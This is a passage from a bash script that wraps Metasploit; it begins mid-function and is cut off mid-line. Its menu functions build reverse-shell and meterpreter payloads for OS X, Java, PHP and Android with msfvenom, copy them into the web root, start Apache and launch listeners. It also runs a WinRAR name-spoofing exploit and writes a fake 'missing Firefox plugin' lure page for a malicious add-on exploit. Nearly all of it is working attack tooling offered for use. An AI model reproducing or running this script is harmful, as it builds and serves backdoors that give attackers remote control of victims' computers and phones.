echo -n "Enter LHOST=$RED" 2571 | read host 2572 | echo ""$GREEN 2573 | sleep 1 2574 | echo "LHOST==>$BLUE $host "$GREEN 2575 | echo 2576 | echo "===========================" 2577 | sleep 1 2578 | echo 2579 | echo -n "Enter LPORT=$RED" 2580 | read port 2581 | echo $GREEN 2582 | sleep 1 2583 | echo "LPORT==>$BLUE $port"$GREEN 2584 | echo 2585 | echo "===========================" 2586 | sleep 1 2587 | echo 2588 | echo -n "Enter name for payload=$RED" 2589 | read name 2590 | echo $GREEN 2591 | sleep 1 2592 | echo "NAME==>$BLUE $name "$GREEN 2593 | echo 2594 | echo "===========================" 2595 | sleep 1 2596 | echo 2597 | clear 2598 | echo 2599 | echo 2600 | echo " Payload [macho] Final Config: " 2601 | echo "===================================" 2602 | echo "$BLUE LHOST $GREEN:>$RED $host $GREEN" 2603 | echo "$BLUE LPORT $GREEN:>$RED $port $GREEN" 2604 | echo "$BLUE NAME $GREEN:>$RED $name $GREEN" 2605 | echo "$BLUE PAYLOAD $GREEN:>$RED osx/x86/shell_reverse_tcp $GREEN " 2606 | echo "$BLUE SAVE IN $GREEN:>$RED /root/Desktop/Output/$name and /var/www/$name $GREEN" 2607 | sleep 3 2608 | cd $hh/Desktop/ 2609 | if [ -d Output ];then 2610 | echo 2611 | echo "Found Output " 2612 | sleep 1 2613 | else 2614 | mkdir Output 2615 | fi 2616 | cd .. 2617 | echo 2618 | echo 2619 | sleep 1 2620 | echo 2621 | echo $BLUE"[*]$RED:$GREEN Create $RED [$BLUE $name $RED] " 2622 | sleep 1 2623 | xterm -T "DHH - Create [$name]" -geometry 110x23 -e "msfvenom -p osx/x86/shell_reverse_tcp LHOST=$host LPORT=$port -a x86 --platform OSX -f macho > $hh/Desktop/Output/$name" 2624 | echo 2625 | echo $BLUE"[*]$RED:$GREEN Done! " 2626 | sleep 1 2627 | echo 2628 | echo "$BLUE[*]$GREEN cp$RED:$BLUE[$RED $name $GREEN to $RED /var/www/html/$name$BLUE ]" 2629 | cd $hh/Desktop/Output/ 2630 | chmod +x $name 2631 | cp $name /var/www/html 2632 | echo 2633 | echo "Done ! " 2634 | sleep 2 2635 | echo "" $GREEN 2636 | echo "[*]$RED:$BLUE STARTING APACHE SERVER$RED.........." 2637 | sleep 2 2638 | xterm -T "DHH - start Apache webserver" -geometry 110x23 -e "service apache2 start" 2639 | echo $BLUE[*]$RED:$RED[start apache2]$RED:$GREEN[ OK ] 2640 | sleep 2 2641 | echo 2642 | echo "[*]Done apache server has been started " 2643 | sleep 2 2644 | echo 2645 | echo 2646 | echo "$RED Done Payload has been Created in$GREEN ->>>$BLUE[ /root/Desktop/Output/$name and /var/www/html/$name ]" 2647 | echo 2648 | echo 2649 | sleep 7 2650 | clear 2651 | echo 2652 | echo 2653 | echo $BLUE" WHAT YOU WANT " 2654 | echo $BLUE"================= " 2655 | echo 2656 | echo "1 - create Listener on [$GREEN $name $BLUE]" 2657 | echo "2 - back to the menu " $GREEN 2658 | echo 2659 | echo -n "Enter choice ->> "$RED 2660 | read choice 2661 | if [ $choice = 1 ];then 2662 | clear 2663 | echo 2664 | echo 2665 | echo "starting Listener on $BLUE[ $name ]" 2666 | sleep 1 2667 | xterm -T "DHH - [$name] Listener " -geometry 110x23 -e "sudo msfconsole -x 'use exploit/multi/handler; set LHOST $host; set LPORT $port; set PAYLOAD osx/x86/shell_reverse_tcp; exploit -j'" 2668 | else 2669 | 2670 | if [ $choice = 2 ];then 2671 | clear 2672 | fi 2673 | fi 2674 | 2675 | } 2676 | 2677 | 2678 | 2679 | 2680 | java () { 2681 | clear 2682 | 2683 | cat << ! 2684 | 2685 | $RED 2686 | 2687 | ┌┬┐┬ ┬┬ ┌┬┐┬ ┬ ┌─┐─┐ ┬┌─┐┬ ┌─┐┬┌┬┐ 2688 | ││││ ││ │ │ │ ├┤ ┌┴┬┘├─┘│ │ ││ │ 2689 | ┴ ┴└─┘┴─┘┴ └─┘ └─┘┴ └─┴ ┴─┘└─┘┴ ┴$GREEN 2690 | 2691 | ! 2692 | echo "============================================="$BLUE 2693 | echo 2694 | echo "please wait.........." 2695 | sleep 2 2696 | clear 2697 | echo 2698 | echo "------------------------------------------" 2699 | echo "Your Local IP Address:[ $myip " 2700 | echo " " 2701 | echo "Your Public IP Address:[ $myip2 " 2702 | echo " " 2703 | echo "------------------------------------------" 2704 | echo "" $GREEN 2705 | echo 2706 | echo -n "Enter LHOST=$RED" 2707 | read LHOST 2708 | echo "" $GREEN 2709 | sleep 1 2710 | echo "LHOST==>$BLUE $LHOST "$GREEN 2711 | echo 2712 | echo "===========================" 2713 | echo 2714 | echo -n "Enter LPORT=$RED " 2715 | read port 2716 | echo "" $GREEN 2717 | sleep 1 2718 | echo "LPORT==>$BLUE $port "$GREEN 2719 | echo 2720 | echo "===========================" 2721 | echo 2722 | echo -n "Enter URIPATH=$RED" 2723 | read URIPATH 2724 | echo "" $GREEN 2725 | sleep 1 2726 | echo "URIPATH==>$BLUE $URIPATH"$GREEN 2727 | echo 2728 | echo "===========================" 2729 | sleep 1 2730 | echo 2731 | echo -n "Enter name for pyload=$RED" 2732 | read name 2733 | echo "" $GREEN 2734 | sleep 1 2735 | echo "NAME=>>$BLUE $name "$GREEN 2736 | echo 2737 | echo "=============================" 2738 | sleep 1 2739 | echo 2740 | clear 2741 | echo 2742 | echo 2743 | echo " Payload [jar] Final Config: " 2744 | echo "===================================" 2745 | echo "$BLUE LHOST $GREEN:>$RED $LHOST $GREEN" 2746 | echo "$BLUE LPORT $GREEN:>$RED $port $GREEN" 2747 | echo "$BLUE NAME $GREEN:>$RED $name $GREEN" 2748 | echo "$BLUE PAYLOAD $GREEN:>$RED multi/browser/java_signed_applet $GREEN" 2749 | echo "$BLUE URIPATH $GREEN:>$RED $URIPATH $GREEN " 2750 | echo "$BLUE SAVE IN $GREEN:>$RED $hh/Desktop/Output/$name and /var/www/html/$name" 2751 | sleep 3 2752 | cd $hh/Desktop/ 2753 | if [ -d Output ];then 2754 | echo ""$GREEN 2755 | echo 2756 | echo "Output Fonud " 2757 | echo 2758 | echo 2759 | echo 2760 | echo 2761 | else 2762 | mkdir Output 2763 | fi 2764 | cd .. 2765 | sleep 1 2766 | echo $BLUE"[*]$RED:$GREEN Create $RED [$BLUE $name $RED] " 2767 | sleep 1 2768 | javaa=.jar 2769 | xterm -T "DHH - Create [$name]" -geometry 110x23 -e "msfvenom -p java/meterpreter/reverse_tcp LHOST=$LHOST LPORT=$port R > $hh/Desktop/Output/$name$javaa" 2770 | echo 2771 | echo $BLUE"[*]$RED:$GREEN Done! " 2772 | sleep 1 2773 | echo 2774 | echo "$BLUE[*]$GREEN cp$RED:$BLUE[$RED $name $GREEN to $RED /var/www/html/$name$BLUE ]" 2775 | cd $hh/Desktop/Output/ 2776 | chmod +x $name$javaa 2777 | cp $name$javaa /var/www/html 2778 | echo 2779 | echo "Done ! " 2780 | sleep 2 2781 | echo "" $GREEN 2782 | echo "[*]$RED:$BLUE STARTING APACHE SERVER$RED.........." 2783 | sleep 2 2784 | xterm -T "DHH - start Apache webserver" -geometry 110x23 -e "service apache2 start" 2785 | echo $BLUE[*]$RED:$RED[start apache2]$RED:$GREEN[ OK ] 2786 | sleep 2 2787 | echo 2788 | echo "[*]Done apache server has been started " 2789 | sleep 2 2790 | echo 2791 | echo 2792 | echo "$RED Done Payload has been Created in$GREEN ->>>$BLUE[ /root/Desktop/Output/$name and /var/www/html/$name ]" 2793 | echo 2794 | echo 2795 | sleep 7 2796 | clear 2797 | echo 2798 | echo 2799 | echo $BLUE" WHAT YOU WANT " 2800 | echo $BLUE"================= " 2801 | echo 2802 | echo "1 - Create Listener on [ $GREEN $name ]"$BLUE 2803 | echo "2 - back to the menu " $GREEN 2804 | echo 2805 | echo -n "Enter choice ->> "$RED 2806 | read choice 2807 | if [ $choice = 1 ];then 2808 | clear 2809 | echo 2810 | echo 2811 | echo "starting listener on $BLUE[$name]" 2812 | sleep 1 2813 | xterm -T "DHH - listener on [$name] " -geometry 110x23 -e "sudo msfconsole -x 'use exploit/multi/browser/java_signed_applet; set LHOST $LHOST; set SRVHOST $LHOST; set URIPATH $URIPATH; set LPORT $port; set PAYLOAD java/meterpreter/reverse_tcp; set target 0; exploit -j'" 2814 | 2815 | elif [ $choice = 2 ];then 2816 | clear 2817 | fi 2818 | 2819 | 2820 | } 2821 | 2822 | 2823 | web () { 2824 | clear 2825 | 2826 | cat << ! 2827 | 2828 | $RED 2829 | 2830 | ┬ ┬┌─┐┌┐ ┌─┐┬ ┬┌─┐ ┌─┐┌─┐┬ ┬┬ ┌─┐┌─┐┌┬┐ 2831 | │││├┤ ├┴┐├─┘├─┤├─┘ ├─┘├─┤└┬┘│ │ │├─┤ ││ 2832 | └┴┘└─┘└─┘┴ ┴ ┴┴ ┴ ┴ ┴ ┴ ┴─┘└─┘┴ ┴─┴┘$GREEN 2833 | 2834 | ! 2835 | echo "============================================="$BLUE 2836 | echo 2837 | echo "please wait.......... " 2838 | sleep 2 2839 | clear 2840 | echo ""$BLUE 2841 | echo "------------------------------------------" 2842 | echo "Your Local IP Address:[ $myip ] " 2843 | echo " " 2844 | echo "Your Public IP Address:[ $myip2 ] " 2845 | echo " " 2846 | echo "------------------------------------------" 2847 | echo "" $GREEN 2848 | echo -n "Enter LHOST=$RED" 2849 | read host 2850 | echo ""$GREEN 2851 | sleep 1 2852 | echo "LHOST==>$BLUE $host "$GREEN 2853 | echo 2854 | echo "===========================" 2855 | sleep 1 2856 | echo 2857 | echo -n "Enter LPORT=$RED" 2858 | read port 2859 | echo $GREEN 2860 | sleep 1 2861 | echo "LPORT==>$BLUE $port"$GREEN 2862 | echo 2863 | echo "===========================" 2864 | sleep 1 2865 | echo 2866 | echo -n "Enter name for payload=$RED" 2867 | read name 2868 | echo $GREEN 2869 | sleep 1 2870 | echo "NAME==>$BLUE $name "$GREEN 2871 | echo 2872 | echo "===========================" 2873 | sleep 1 2874 | echo 2875 | clear 2876 | echo 2877 | echo 2878 | echo " Payload [php] Final Config: " 2879 | echo "==================================" 2880 | echo "$BLUE LHOST $GREEN:>$RED $host $GREEN" 2881 | echo "$BLUE LPORT $GREEN:>$RED $port $GREEN" 2882 | echo "$BLUE NAME $GREEN:>$RED $name $GREEN" 2883 | echo "$BLUE PAYLOAD $GREEN:>$RED php/meterpreter/reverse_tcp $GREEN " 2884 | echo "$BLUE SAVE IN $GREEN:>$RED /root/Desktop/Output/$name and /var/www/$name $GREEN" 2885 | sleep 3 2886 | cd $hh/Desktop/ 2887 | if [ -d Output ];then 2888 | echo 2889 | echo "Found Output " 2890 | sleep 1 2891 | else 2892 | mkdir Output 2893 | fi 2894 | cd .. 2895 | dds=.php 2896 | echo 2897 | echo 2898 | sleep 1 2899 | echo 2900 | echo $BLUE"[*]$RED:$GREEN Create $RED [$BLUE $name $RED] " 2901 | sleep 1 2902 | xterm -T "DHH - Create [$name]" -geometry 110x23 -e "msfvenom -p php/meterpreter/reverse_tcp LHOST=$host LPORT=$port -f raw > $hh/Desktop/Output/$name$dds" 2903 | echo 2904 | echo $BLUE"[*]$RED:$GREEN Done! " 2905 | sleep 1 2906 | echo 2907 | echo "$BLUE[*]$GREEN cp$RED:$BLUE[$RED $name $GREEN to $RED /var/www/html/$name$BLUE ]" 2908 | cd $hh/Desktop/Output/ 2909 | chmod +x $name$dds 2910 | cp $name$dds /var/www/html 2911 | echo 2912 | echo "Done ! " 2913 | sleep 2 2914 | echo "" $GREEN 2915 | echo "[*]$RED:$BLUE STARTING APACHE SERVER$RED.........." 2916 | sleep 2 2917 | xterm -T "DHH - start Apache webserver" -geometry 110x23 -e "service apache2 start" 2918 | echo $BLUE[*]$RED:$RED[start apache2]$RED:$GREEN[ OK ] 2919 | sleep 2 2920 | echo 2921 | echo "[*]Done apache server has been started " 2922 | sleep 2 2923 | echo 2924 | echo 2925 | echo "$RED Done Payload has been Created in$GREEN ->>>$BLUE[ /root/Desktop/Output/$name and /var/www/html/$name ]" 2926 | echo 2927 | echo 2928 | sleep 7 2929 | clear 2930 | echo 2931 | echo 2932 | echo $BLUE" WHAT YOU WANT " 2933 | echo $BLUE"================= " 2934 | echo 2935 | echo "1 - create Listener on [ $GREEN $name $BLUE]" 2936 | echo "2 - back to the menu " $GREEN 2937 | echo 2938 | echo -n "Enter choice ->> "$RED 2939 | read choice 2940 | if [ $choice = 1 ];then 2941 | clear 2942 | echo 2943 | echo 2944 | echo "starting Listener on $BLUE[ $name ]" 2945 | sleep 1 2946 | xterm -T "DHH - [$name] Listener " -geometry 110x23 -e "sudo msfconsole -x 'use exploit/multi/handler; set LHOST $host; set LPORT $port; set PAYLOAD php/meterpreter/reverse_tcp; exploit -j'" 2947 | 2948 | elif [ $choice = 2 ];then 2949 | clear 2950 | fi 2951 | 2952 | 2953 | } 2954 | 2955 | wiri () { 2956 | clear 2957 | 2958 | cat << ! 2959 | 2960 | $RED 2961 | 2962 | 2963 | 2964 | _ _ _ _ _____ _ _ 2965 | | | | |_|___ ___ ___ ___ | __ |___ ___| |_ _| |___ ___ ___ 2966 | | | | | | | _| .'| _| | __ -| .'| _| '_| . | . | . | _| 2967 | |_____|_|_|_|_| |__,|_| |_____|__,|___|_,_|___|___|___|_| 2968 | $GREEN 2969 | ! 2970 | echo "==================================================================="$BLUE 2971 | echo 2972 | echo "please wait........." 2973 | sleep 3 2974 | clear 2975 | echo "" 2976 | echo "------------------------------------------" 2977 | echo "Your Local IP Address:[ $myip " 2978 | echo " " 2979 | echo "Your Public IP Address:[ $myip2 " 2980 | echo " " 2981 | echo "------------------------------------------" 2982 | echo "" $GREEN 2983 | echo -n "Enter LHOST=$RED" 2984 | read host 2985 | echo ""$GREEN 2986 | sleep 1 2987 | echo "LHOST==>$BLUE $host "$GREEN 2988 | echo 2989 | echo "===========================" 2990 | sleep 1 2991 | echo 2992 | echo -n "Enter your zip name=$RED" 2993 | read name 2994 | fainalnem=$name > /dev/null 2>&1 2995 | echo $GREEN 2996 | sleep 1 2997 | echo "NAME==>$BLUE $name "$GREEN 2998 | echo 2999 | echo 3000 | echo "===========================" 3001 | sleep 1 3002 | echo 3003 | echo -n "Enter Spoof file=$RED" 3004 | read spooff 3005 | echo "" $GREEN 3006 | sleep 1 3007 | echo "spoof file==>$BLUE $spooff "$GREEN 3008 | echo 3009 | sleep 2 3010 | clear 3011 | echo 3012 | echo 3013 | echo " Final [Win backdoor] Config: " 3014 | echo "===================================" 3015 | echo "$BLUE LHOST $GREEN:>$RED $host $GREEN" 3016 | echo "$BLUE NAME $GREEN:>$RED $name $GREEN" 3017 | echo "$BLUE SpoofFile $GREEN:>$RED $spooff $GREEN" 3018 | echo "$BLUE PAYLOAD $GREEN:>$RED windows/fileformat/winrar_name_spoofing $GREEN" 3019 | echo "$BLUE SAVE IN $GREEN:>$RED $hh/Desktop/Output/$name and /var/www/html/$name $GREEN" 3020 | sleep 3 3021 | cd $hh/Desktop/ 3022 | if [ -d Output ];then 3023 | echo 3024 | echo "Output fonud " 3025 | echo 3026 | echo 3027 | else 3028 | mkdir Output 3029 | fi 3030 | cd .. 3031 | sleep 1 3032 | echo $BLUE"[*]$RED:$GREEN Create $RED [$BLUE $name $RED] " 3033 | sleep 1 3034 | xterm -T "DHH - Create: $name" -geometry 110x23 -e "sudo msfconsole -x 'use exploit/windows/fileformat/winrar_name_spoofing; set LHOST $host; set SPOOF $spooff; set TARGET 0; exploit -j'" 3035 | echo 3036 | echo $BLUE"[*]$RED:$GREEN Done! " 3037 | sleep 1 3038 | echo 3039 | echo "$BLUE[*]$GREEN cp$RED:$BLUE[$RED $name $GREEN to $RED /var/www/html/$name$BLUE ]" 3040 | cd $hh/.msf4/local 3041 | chmod +x msf.zip && mv msf.zip $name 3042 | cp $name /var/www/html && cp $name $hh/Desktop/Output/ 3043 | cd .. 3044 | echo $BLUE"[*]$RED:$GREEN Done! " 3045 | echo 3046 | echo 3047 | echo 3048 | echo "$RED Done Payload has been Created in$GREEN ->>>$BLUE[ /root/Desktop/Output/$name and /var/www/html/$name ]" 3049 | echo 3050 | echo 3051 | sleep 7 3052 | clear 3053 | echo 3054 | echo $BLUE" WHAT YOU WANT " 3055 | echo $BLUE"================= " 3056 | echo 3057 | echo "1 - create Listener on [ $GREEN $name ]"$BLUE 3058 | echo "2 - back to the menu " $GREEN 3059 | echo 3060 | echo -n "Enter choice ->> "$RED 3061 | read choice 3062 | if [ $choice = 1 ];then 3063 | clear 3064 | echo 3065 | echo 3066 | echo "starting listener on $BLUE[$name]" 3067 | sleep 1 3068 | xterm -T "DHH - [$name] Listener" -geometry 110x23 -e "sudo msfconsole -x 'use exploit/multi/handler; set LHOST $host; set PAYLOAD windows/meterpreter/reverse_tcp; exploit -j'" 3069 | 3070 | elif [ $choice = 2 ];then 3071 | clear 3072 | fi 3073 | 3074 | 3075 | } 3076 | 3077 | fireadd () { 3078 | clear 3079 | echo 3080 | 3081 | cat << ! 3082 | 3083 | 3084 | $RED 3085 | _______ __ ___ __ __ __ __ __ 3086 | | ___|__|.----.-----.' _|.-----.--.--. .---.-.--| |.--| |__| |_|__|.-----.-----. 3087 | | ___| || _| -__| _|| _ |_ _| | _ | _ || _ | | _| || _ | | 3088 | |___| |__||__| |_____|__| |_____|__.__| |___._|_____||_____|__|____|__||_____|__|__| $GREEN 3089 | 3090 | 3091 | ! 3092 | echo "==========================================================================================="$BLUE 3093 | echo 3094 | echo "Please wait........" 3095 | sleep 3 3096 | clear 3097 | echo "" 3098 | echo "------------------------------------------" 3099 | echo "Your Local IP Address:[ $myip " 3100 | echo " " 3101 | echo "Your Public IP Address:[ $myip2 " 3102 | echo " " 3103 | echo "------------------------------------------" 3104 | echo "" $GREEN 3105 | echo -n "Enter SRVHOST=$RED" 3106 | read SRVHOST 3107 | echo ""$GREEN 3108 | sleep 1 3109 | echo "SRVHOST==>$BLUE $SRVHOST "$GREEN 3110 | echo 3111 | echo "===========================" 3112 | sleep 1 3113 | echo 3114 | echo -n "Enter SRVPORT=$RED" 3115 | read SRVPORT 3116 | echo $GREEN 3117 | sleep 1 3118 | echo "SRVPORT==>$BLUE $SRVPORT "$GREEN 3119 | echo 3120 | echo 3121 | echo "===========================" 3122 | sleep 1 3123 | echo 3124 | echo -n "Enter NAME For Fake Addition=$RED" 3125 | read addition 3126 | echo "" $GREEN 3127 | sleep 1 3128 | echo "Fake Addition NAME==>$BLUE $addition "$GREEN 3129 | echo 3130 | echo 3131 | echo 3132 | echo "==============================" 3133 | sleep 1 3134 | echo 3135 | echo -n "Enter URIPATH=$RED" 3136 | read URIPATH 3137 | echo "" $GREEN 3138 | sleep 1 3139 | echo "URIPATH==>$BLUE $URIPATH "$GREEN 3140 | echo 3141 | echo "==============================" 3142 | sleep 1 3143 | echo -n "Enter HTML TITLE=$RED" 3144 | read htmlti 3145 | echo "" $GREEN 3146 | sleep 1 3147 | echo "HTML TITLE==>$BLUE $htmlti "$GREEN 3148 | sleep 2 3149 | clear 3150 | echo 3151 | echo 3152 | cd $hh/Desktop/ 3153 | if [ -d Output ];then 3154 | echo 3155 | echo "Output Found" 3156 | echo 3157 | echo 3158 | else 3159 | mkdir Output 3160 | fi 3161 | cd $hh/Desktop/Output/ 3162 | echo $BLUE"[*]$RED:$GREEN Create $RED [$BLUE index.html $RED] " 3163 | 3164 | echo "" > index.html 3165 | echo "$addition:$htmlti

" >> index.html 3166 | echo "
ERROR:404:FIREFOX:MISSING:PLUGIN:$addition!
" >> index.html 3167 | echo "" >> index.html 3168 | echo "" >> index.html 3169 | echo "" >> index.html 3170 | cd .. 3171 | sleep 3 3172 | echo $BLUE"[*]$RED:$GREEN Done! " 3173 | sleep 3 3174 | clear 3175 | echo 3176 | echo 3177 | echo ""$GREEN 3178 | echo " [Facke Add] Final Config: " 3179 | echo "===============================================" 3180 | echo "$BLUE SRVHOST $GREEN:>$RED $SRVHOST $GREEN" 3181 | echo "$BLUE SRVPORT $GREEN:>$RED $SRVPORT $GREEN" 3182 | echo "$BLUE Fake-Add-NAME $GREEN:>$RED $addition $GREEN" 3183 | echo "$BLUE HTML-TITLE $GREEN:>$RED $htmlti $GREEN" 3184 | echo "$BLUE SAVE IN $GREEN:>$RED $hh/Desktop/Output/index.html and /var/www/html/index.html $GREEN" 3185 | sleep 3 3186 | echo 3187 | echo 3188 | echo "$BLUE[*]$GREEN cp$RED:$BLUE[$RED $name $GREEN to $RED /var/www/html/$name$BLUE ]" 3189 | apa=/var/www/html 3190 | cd $hh/Desktop/Output 3191 | cp index.html $apa/index.html 3192 | sleep 1 3193 | echo $BLUE"[*]$RED:$GREEN Done! " 3194 | echo "" $GREEN 3195 | echo "[*]$RED:$BLUE STARTING APACHE SERVER$RED.........." 3196 | sleep 2 3197 | xterm -T "DHH - start Apache webserver" -geometry 110x23 -e "service apache2 start" 3198 | echo $BLUE[*]$RED:$RED[start apache2]$RED:$GREEN[ OK ] 3199 | sleep 1 3200 | echo 3201 | echo "[*]Done apache server has been started " 3202 | sleep 2 3203 | echo 3204 | echo 3205 | echo 3206 | echo "$RED Done Fake Firefox addition has been Created in$GREEN ->>>$BLUE[ $apa/index.html and /root/Desktop/Output/index.html ]" 3207 | echo 3208 | echo 3209 | sleep 7 3210 | clear 3211 | echo 3212 | echo $BLUE" WHAT YOU WANT " 3213 | echo $BLUE"================= " 3214 | echo 3215 | echo "1 - create Listener on [ $GREEN $addition $BLUE]" 3216 | echo "2 - back to the menu " $GREEN 3217 | echo 3218 | echo -n "Enter choice ->> "$RED 3219 | read choice 3220 | if [ $choice = 1 ];then 3221 | clear 3222 | echo 3223 | echo 3224 | echo "starting listener on $BLUE[$addition]" 3225 | sleep 2 3226 | xterm -T "DHH - listener on [ $addition ]" -geometry 110x23 -e "sudo msfconsole -x 'use exploit/multi/browser/firefox_xpi_bootstrapped_addon; set TARGET 1; set ADDONNAME $addition; set SRVHOST $SRVHOST; set URIPATH $URIPATH; set AutoUninstall 1; set SRVPORT $SRVPORT; exploit -j'" 3227 | 3228 | elif [ $choice = 2 ];then 3229 | clear 3230 | fi 3231 | 3232 | } 3233 | 3234 | and1 () { 3235 | clear 3236 | echo 3237 | echo "please wait.......... " 3238 | sleep 2 3239 | clear 3240 | echo ""$BLUE 3241 | echo "------------------------------------------" 3242 | echo "Your Local IP Address:[ $myip " 3243 | echo " " 3244 | echo "Your Public IP Address:[ $myip2 " 3245 | echo " " 3246 | echo "------------------------------------------" 3247 | echo "" $GREEN 3248 | echo -n "Enter LHOST=$RED" 3249 | read host 3250 | echo ""$GREEN 3251 | sleep 1 3252 | echo "LHOST==>$BLUE $host "$GREEN 3253 | echo 3254 | echo "===========================" 3255 | sleep 1 3256 | echo 3257 | echo -n "Enter LPORT=$RED" 3258 | read port 3259 | echo $GREEN 3260 | sleep 1 3261 | echo "LPORT==>$BLUE $port"$GREEN 3262 | echo 3263 | echo "===========================" 3264 | sleep 1 3265 | echo 3266 | echo -n "Enter name for payload=$RED" 3267 | read name 3268 | echo $GREEN 3269 | sleep 1 3270 | echo "NAME==>$BLUE $name "$GREEN 3271 | echo 3272 | echo "===========================" 3273 | sleep 1 3274 | echo 3275 | clear 3276 | echo 3277 | echo 3278 | echo " Payload [APK] Final Config: " 3279 | echo "===================================" 3280 | echo "$BLUE LHOST $GREEN:>$RED $host $GREEN" 3281 | echo "$BLUE LPORT $GREEN:>$RED $port $GREEN" 3282 | echo "$BLUE NAME $GREEN:>$RED $name $GREEN" 3283 | echo "$BLUE PAYLOAD $GREEN:>$RED android/meterpreter/reverse_tcp $GREEN " 3284 | echo "$BLUE SAVE IN $GREEN:>$RED /root/Desktop/Output/$name and /var/www/$name $GREEN" 3285 | sleep 3 3286 | cd $hh/Desktop/ 3287 | if [ -d Output ];then 3288 | echo 3289 | echo "Found Output " 3290 | sleep 1 3291 | else 3292 | mkdir Output 3293 | fi 3294 | cd .. 3295 | echo 3296 | echo 3297 | sleep 1 3298 | echo 3299 | echo $BLUE"[*]$RED:$GREEN Create $RED [$BLUE $name $RED] " 3300 | aa=.apk 3301 | sleep 1 3302 | xterm -T "DHH - Create [$name]" -geometry 110x23 -e "msfvenom -p android/meterpreter/reverse_tcp LHOST=$host LPORT=$port -a dalvik --platform Android -f raw > $hh/Desktop/Output/$name$aa" 3303 | echo 3304 | echo $BLUE"[*]$RED:$GREEN Done! " 3305 | sleep 1 3306 | echo 3307 | echo "$BLUE[*]$GREEN cp$RED:$BLUE[$RED $name $GREEN to $RED /var/www/html/$name$BLUE ]" 3308 | cd $hh/Desktop/Output/ 3309 | chmod +x $name$aa 3310 | cp $name$aa /var/www/html 3311 | echo 3312 | echo "Done ! " 3313 | sleep 2 3314 | echo "" $GREEN 3315 | echo "[*]$RED:$BLUE STARTING APACHE SERVER$RED.........." 3316 | sleep 2 3317 | xterm -T "DHH - start Apache webserver" -geometry 110x23 -e "service apache2 start" 3318 | echo $BLUE[*]$RED:$RED[start apache2]$RED:$GREEN[ OK ] 3319 | sleep 2 3320 | echo 3321 | echo "[*]Done apache server has been started " 3322 | sleep 2 3323 | echo 3324 | echo 3325 | echo "$RED Done Payload has been Created in$GREEN ->>>$BLUE[ /root/Desktop/Output/$name and /var/www/html/$name ]" 3326 | echo 3327 | echo 3328 | sleep 7 3329 | clear 3330 | echo 3331 | echo 3332 | echo $BLUE" WHAT YOU WANT " 3333 | echo $BLUE"================= " 3334 | echo 3335 | echo "1 - create Listener on [$GREEN $name $BLUE]" 3336 | echo "2 - back to the menu " $GREEN 3337 | echo 3338 | echo -n "Enter choice ->> "$RED 3339 | read choice 3340 | if [ $choice = 1 ];then 3341 | clear 3342 | echo 3343 | echo 3344 | echo "starting Listener on $BLUE[ $name ]" 3345 | sleep 1 3346 | xterm -T "DHH - [$name] Listener" -geometry 110x23 -e "sudo msfconsole -x 'use exploit/multi/handler; set LHOST $host; set LPORT $port; set PAYLOAD android/meterpreter/reverse_tcp; exploit -j'" 3347 | else 3348 | 3349 | if [ $choice = 2 ];then 3350 | clear 3351 | fi 3352 | fi 3353 | 3354 | } 3355 | 3356 | 3357 | and2 () { 3358 | clear 3359 | echo 3360 | echo "please wait.......... " 3361 | sleep 2 3362 | clear 3363 | echo ""$BLUE 3364 | echo "------------------------------------------" 3365 | echo "Your Local IP Address:[ $myip " 3366 | echo " " 3367 | echo "Your Public IP Address:[ $myip2 " 3368 | echo " " 3369 | echo "------------------------------------------" 3370 | echo "" $GREEN 3371 | echo -n "Enter LHOST=$RED" 3372 | read host 3373 | echo ""$GREEN 3374 | sleep 1 3375 | echo "LHOST==>$BLUE $host "$GREEN 3376 | echo 3377 | echo "===========================" 3378 | sleep 1 3379 | echo 3380 | echo -n "Enter LPORT=$RED" 3381 | read port 3382 | echo $GREEN 3383 | sleep 1 3384 | echo "LPORT==>$BLUE $port"$GREEN 3385 | echo 3386 | echo "===========================" 3387 | sleep 1 3388 | echo 3389 | echo -n "Enter name for payload=$RED" 3390 | read name 3391 | echo $GREEN 3392 | sleep 1 3393 | echo "NAME==>$BLUE $name "$GREEN 3394 | echo 3395 | echo "===========================" 3396 | sleep 1 3397 | echo 3398 | clear 3399 | echo 3400 | echo 3401 | echo " Payload [APK] Final Config: " 3402 | echo "===================================" 3403 | echo "$BLUE LHOST $GREEN:>$RED $host $GREEN" 3404 | echo "$BLUE LPORT $GREEN:>$RED $port $GREEN" 3405 | echo "$BLUE NAME $GREEN:>$RED $name $GREEN" 3406 | echo "$BLUE PAYLOAD $GREEN:>$RED android/meterpreter/reverse_http $GREEN " 3407 | echo "$BLUE SAVE IN $GREEN:>$RED /root/Desktop/Output/$name and /var/www/$name $GREEN" 3408 | sleep 3 3409 | cd $hh/Desktop/ 3410 | if [ -d Output ];then 3411 | echo 3412 | echo "Found Output " 3413 | sleep 1 3414 | else 3415 | mkdir Output 3416 | fi 3417 | cd .. 3418 | echo 3419 | echo 3420 | sleep 1 3421 | echo 3422 | echo $BLUE"[*]$RED:$GREEN Create $RED [$BLUE $name $RED] " 3423 | aa=.apk 3424 | sleep 1 3425 | xterm -T "DHH - Create [$name]" -geometry 110x23 -e "msfvenom -p android/meterpreter/reverse_http LHOST=$host LPORT=$port -a dalvik --platform Android -f raw > $hh/Desktop/Output/$name$aa" 3426 | echo 3427 | echo $BLUE"[*]$RED:$GREEN Done! " 3428 | sleep 1 3429 | echo 3430 | echo "$BLUE[*]$GREEN cp$RED:$BLUE[$RED $name $GREEN to $RED /var/www/html/$name$BLUE ]" 3431 | cd $hh/Desktop/Output/ 3432 | chmod +x $name$aa 3433 | cp $name$aa /var/www/html 3434 | echo 3435 | echo "Done ! " 3436 | sleep 2 3437 | echo "" $GREEN 3438 | echo "[*]$RED:$BLUE STARTING APACHE SERVER$RED.........." 3439 | sleep 2 3440 | xterm -T "DHH - start Apache webserver" -geometry 110x23 -e "service apache2 start" 3441 | echo $BLUE[*]$RED:$RED[start apache2]$RED:$GREEN[ OK ] 3442 | sleep 2 3443 | echo 3444 | echo "[*]Done apache server has been started " 3445 | sleep 2 3446 | echo 3447 | echo 3448 | echo "$RED Done Payload has been Created in$GREEN ->>>$BLUE[ /root/Desktop/Output/$name and /var/www/html/$name ]" 3449 | echo 3450 | echo 3451 | sleep 7 3452 | clear 3453 | echo 3454 | echo 3455 | echo $BLUE" WHAT YOU WANT " 3456 | echo $BLUE"================= " 3457 | echo 3458 | echo "1 - create Listener on [$GREEN $name $BLUE]" 3459 | echo "2 - back to the menu " $GREEN 3460 | echo 3461 | echo -n "Enter choice ->> "$RED 3462 | read choice 3463 | if [ $choice = 1 ];then 3464 | clear 3465 | echo 3466 | echo 3467 | echo "starting Listener on $BLUE[ $name ]" 3468 | sleep 1 3469 | xterm -T "DHH - [$name] 